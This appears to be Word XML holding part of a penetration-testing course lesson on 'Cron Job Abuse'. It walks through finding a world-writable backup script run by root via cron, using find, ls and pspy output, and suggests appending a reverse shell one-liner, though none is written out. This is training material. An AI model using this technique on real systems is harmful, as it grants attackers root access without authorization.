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3323" w14:textId="77777777" w:rsidR="00726ABF" w:rsidRPr="00726ABF" w:rsidRDefault="00726ABF" w:rsidP="00726A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E"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Cron Job Abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF186E6" w14:textId="77777777" w:rsidR="00726ABF" w:rsidRPr="00726ABF" w:rsidRDefault="00A511E4" w:rsidP="00726ABF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:pict w14:anchorId="149F045D">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D126CF"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Cron jobs can also be set run one time (such as on boot). They are typically used for administrative tasks such as running backups, cleaning up directories, etc. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>crontab</w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> command can create a cron file, which will be run by the cron daemon on the schedule specified. When created, the cron file will be created in </w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/var/spool/cron</w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the specific user that creates it. Each entry in the crontab file requires six items in the following order: minutes, hours, days, months, weeks, commands. For example, the entry </w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>0 */12 * * * /home/admin/backup.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> would run every 12 hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCA9369"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The root crontab is almost always only editable by the root user or a user with full sudo privileges; however, it can still be abused. You may find a world-writable script that runs as root and, even if you cannot read the crontab to know the exact schedule, you may be able to ascertain how often it runs (i.e., a backup script that creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.tar.gz</w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> file every 12 hours). In this case, you can append a command onto the end of the script (such as a reverse shell one-liner), and it will execute the next time the cron job runs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0286168A"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Certain applications create cron files in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/etc/cron.d</w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory and may be misconfigured to allow a non-root user to edit them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1B551E"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First, let's look around the system for any writeable files or directories. The file </w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>backup.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/dmz-backups</w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory is interesting and seems like it could be running on a cron job.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9D477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yovecio@htb[/htb]$ find / -path /proc -prune -o -type f -perm -o+w 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CAF8BE"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2DB5756E"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/etc/cron.daily/backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2566BFB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/dmz-backups/backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D5EFF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/proc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37642682"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/sys/fs/cgroup/memory/init.scope/cgroup.event_control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1826173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0855E94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&lt;SNIP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E3477F"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/home/backupsvc/backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443AB2E5"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1AEDDA47"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&lt;SNIP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DB9C87"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A quick look in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/dmz/backups</w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory shows what appears to be files created every three minutes. This seems to be a major misconfiguration. Perhaps the sysadmin meant to specify every three hours like </w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>0 */3 * * *</w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> but instead wrote </w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>*/3 * * * *</w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, which tells the cron job to run every three minutes. The second issue is that the </w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>backup.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell script is world writeable and runs as root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5110AC8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yovecio@htb[/htb]$ ls -la /dmz-backups/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B692F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0230561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total 36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136258DD"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drwxrwxrwx  2 root root 4096 Aug 31 02:39 .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF7E0D7"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drwxr-xr-x 24 root root 4096 Aug 31 02:24 ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46797EAF"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-rwxrwxrwx  1 root root  230 Aug 31 02:39 backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFDCC9A"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-rw-r--r--  1 root root 3336 Aug 31 02:24 www-backup-2020831-02:24:01.tgz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9EFF4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-rw-r--r--  1 root root 3336 Aug 31 02:27 www-backup-2020831-02:27:01.tgz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB4C7CD"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lastRenderedPageBreak/>
        <w:t>-rw-r--r--  1 root root 3336 Aug 31 02:30 www-backup-2020831-02:30:01.tgz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5461B7FF"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-rw-r--r--  1 root root 3336 Aug 31 02:33 www-backup-2020831-02:33:01.tgz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DC982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-rw-r--r--  1 root root 3336 Aug 31 02:36 www-backup-2020831-02:36:01.tgz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C5632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-rw-r--r--  1 root root 3336 Aug 31 02:39 www-backup-2020831-02:39:01.tgz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F790930"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We can confirm that a cron job is running using </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00726ABF">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>pspy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, a command-line tool used to view running processes without the need for root privileges. We can use it to see commands run by other users, cron jobs, etc. It works by scanning </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00726ABF">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>procfs</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51623740"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Let's run </w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>pspy</w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and have a look. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>-pf</w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag tells the tool to print commands and file system events and </w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>-i 1000</w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> tells it to scan </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00726ABF">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>profcs</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> every 1000ms (or every second).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEE7C2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yovecio@htb[/htb]$ ./pspy64 -pf -i 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1E144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0BFBAF8C"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pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518A4E9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41F61B06"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19778E0C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A91262C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D722838"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 ██░</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7DDC1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 ▐██▓░</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7024FD"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 ██▒▓░</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B47A2DA"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 ░  ░  ██▒▒▒ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563F4DBA"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 ░     ▓██ ░▒░ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5595ABD1"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  ░░       ▒ ▒ ░░  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ED4332"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     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E37BFF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 ░     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCB2DCF"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4CA92CF3"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Config: Printing events (colored=true): processes=true | file-system-events=true ||| Scannning for processes every 1s and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112E3C73"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Draining file system events due to startup...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D1B6E8"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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4962C5C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PID=999    | /usr/bin/VGAuthService </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4A924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UID=111  PID=990    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D9801C"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PID=99     | </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13148A8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PID=988    | /usr/lib/snapd/snapd </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1612A35A"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64116C6A"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&lt;SNIP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B790B9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3DBEFEC5"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PID=1017   | /usr/sbin/cron -f </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63408DA7"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PID=1010   | /usr/sbin/atd -f </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E872173"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PID=1003   | /usr/lib/accountsservice/accounts-daemon </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611B143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PID=1001   | /lib/systemd/systemd-logind </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E2665A"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PID=10     | </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167D80A3"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20:45:03 CMD: UID=0    PID=1      | /sbin/init </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BC9CF1"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20:46:01 FS:                 OPEN | /usr/lib/locale/locale-archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DDBE7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20:46:01 CMD: UID=0    PID=2201   | /bin/bash /dmz-backups/backup.sh </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADFB65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20:46:01 CMD: UID=0    PID=2200   | /bin/sh -c /dmz-backups/backup.sh </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5361FCE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20:46:01 FS:                 OPEN | /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7130A5C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20:46:01 CMD: UID=0    PID=2199   | /usr/sbin/CRON -f </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7253A38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lastRenderedPageBreak/>
        <w:t>2020/09/04 20:46:01 FS:                 OPEN | /usr/lib/locale/locale-archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB601D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20:46:01 CMD: UID=0    PID=2203   | </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7034D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20:46:01 FS:        CLOSE_NOWRITE | /usr/lib/locale/locale-archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA829B8"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20:46:01 FS:                 OPEN | /usr/lib/locale/locale-archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17555D3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20:46:01 FS:        CLOSE_NOWRITE | /usr/lib/locale/locale-archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E62455"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20:46:01 CMD: UID=0    PID=2204   | tar --absolute-names --create --gzip --file=/dmz-backups/www-backup-202094-20:46:01.tgz /var/www/html </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580C957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20:46:01 FS:                 OPEN | /usr/lib/locale/locale-archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CDCB3E"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20:46:01 CMD: UID=0    PID=2205   | gzip </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FAF66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20:46:03 FS:        CLOSE_NOWRITE | /usr/lib/locale/locale-archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CB57AF"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2020/09/04 20:46:03 CMD: UID=0    PID=2206   | /bin/bash /dmz-backups/backup.sh </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EFAA12"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20:46:03 FS:        CLOSE_NOWRITE | /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5C31AF"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2020/09/04 20:46:03 FS:        CLOSE_NOWRITE | /usr/lib/locale/locale-archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EAC271"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From the above output, we can see that a cron job runs the </w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>backup.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> script located in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/dmz-backups</w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory and creating a tarball file of the contents of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/var/www/html</w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory.</w:t>
      </w:r>
    </w:p>
